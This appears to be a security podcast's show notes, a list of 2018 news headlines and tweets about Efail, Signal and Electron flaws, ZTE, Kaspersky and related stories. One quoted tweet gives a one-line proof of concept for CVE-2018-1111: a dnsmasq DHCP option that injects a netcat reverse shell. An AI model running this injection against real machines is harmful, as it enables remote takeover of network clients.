Show notes

Without Nuclear Deal, U.S. Expects Resurgence in Iranian Cyberattacks - The New York Times

How Two Persian Gulf Nations Turned The US Media Into Their Battleground

National Security Council delays publication of cyber strategy over inclusion of 'offensive' measures

Bolton eliminates White House Cybersecurity Coordinator position

Lawmakers introduce bill to save top White House cyber job after Bolton eliminated it

Ex-CIA employee identified as suspect in 'Vault 7' leaks

Sebastian Schinzel on Twitter: "We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. #efail 1/4"

'Efail' exploit can decrypt old emails that were previously encrypted - CyberScoop

Critical PGP and S/MIME bugs can reveal encrypted emails—uninstall now [Updated] | Ars Technica

CVE-2018-1000136 - Electron nodeIntegration Bypass

Security flaw in Electron impacts hundreds of desktop apps

Michael Gianarakis on Twitter: "I don’t know man - as I said I wasn’t involved so I don’t know what was tested and when, what was covered during disclosure etc. All I was saying in my original tweet was that I didn’t read the post to say any specific app was vulnerable or not.… https://t.co/wVmG4FE0yI"

Alfredo Ortega on Twitter: "Remote zero-click JavaScript code execution on signal desktop message app. Thanks @HacKanCuBa and @julianor https://t.co/YgT8akGfBI"

Alfredo Ortega on Twitter: "And we'll release the Signal-Desktop Remote code exec advisory (CVE-2018-10994) in some hours. Not a good week for privacy software. https://t.co/ElysIPAlvo"

It only took five hours to close a critical vulnerability in Signal's desktop client

'Disappearing' Signal Messages Are Stored Indefinitely on Mac Hard Drives - Motherboard

China's ZTE says main operations have ceased after US ban

Lucas Tomlinson on Twitter: "JUST IN: Pentagon orders all stores on U.S. military bases worldwide to ban phones and telecom equipment from Chinese companies Huawei and ZTE, following warnings from top U.S. intelligence officials the Chinese companies could be spying on Americans"

Donald J. Trump on Twitter: "President Xi of China, and I, are working together to give massive Chinese phone company, ZTE, a way to get back into business, fast. Too many jobs in China lost. Commerce Department has been instructed to get it done!"

Microsoft Enabling Javascript in Excel Has Security Pros Anxious | WIRED

Researcher Runs Coinhive Cryptominer in Excel Just Days After Microsoft Announces JavaScript Custom Functions

Researchers Come Up With a Way to Launch Rowhammer Attacks via Network Packets

Georgia governor vetoes cyber bill that would criminalize “unauthorized access” | Ars Technica

Russian Troll Farm Hijacked American Teen Girls’ Computers for Likes

Dutch ditch Kaspersky on fears of Russian government influence

Possible Kaspersky sanctions meet resistance inside U.S. government

Wyden calls for FCC investigation into cell-phone tracking used by law enforcement

Kia‏☆ on Twitter: "this isnt a joke, try out https://t.co/QKa5nNOKjN, you can find the current location of a phone (not just with cell tower info, it can force AGPS) with just *its phone number*; the demo site requires you reply to an SMS but there's no technical requirement against that! https://t.co/kfMDU2qxjZ"

Government would be barred from mandating crypto backdoors under House bill

Symantec's stock plummets after announcement of internal audit

Lawmakers call for action following revelations that APT28 posed as ISIS online

Counterrorism Officials Concerned About Technological Advances of Jihadists in the US

Vigilante Hacks Government-Linked Cyberespionage Group - Motherboard

Pakistani military leverages Facebook Messenger for wide-ranging spyware campaign

DDoS Attacks Leverage UPnP Protocol to Avoid Mitigation

Shadowy Hackers Accidentally Reveal Two Zero-Days to Security Researchers

Windows 10 OpenSSH Client Installed by Default in April 2018 Update

Malicious Apps Get Back on the Play Store Just by Changing Their Name

Multiple OS Vendors Release Security Patches After Misinterpreting Intel Docs

Barkın Kılıç on Twitter: "#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat… https://t.co/NMthW41Xql"

Morning mail: Ecuador's costly Assange spy operation | Australia news | The Guardian

Evil Mainframe Penetration Testing Classes

Evil Mainframe: Mainframe Penetration Testing Registration, Tue, Jun 12, 2018 at 9:00 AM | Eventbrite

Darktrace